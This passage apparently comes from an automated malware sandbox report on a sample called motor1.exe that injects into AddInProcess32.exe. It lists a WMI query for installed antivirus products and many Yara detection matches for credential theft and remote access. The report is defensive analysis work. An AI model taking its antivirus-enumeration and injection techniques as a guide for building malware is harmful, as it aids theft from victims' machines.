Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2466557767.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2599478044.0000021451486000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: motor1.exe PID: 3424, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 1220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: motor1.exe PID: 2120, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2466557767.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2599478044.0000021451486000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: motor1.exe PID: 3424, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 1220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: motor1.exe PID: 2120, type: MEMORYSTR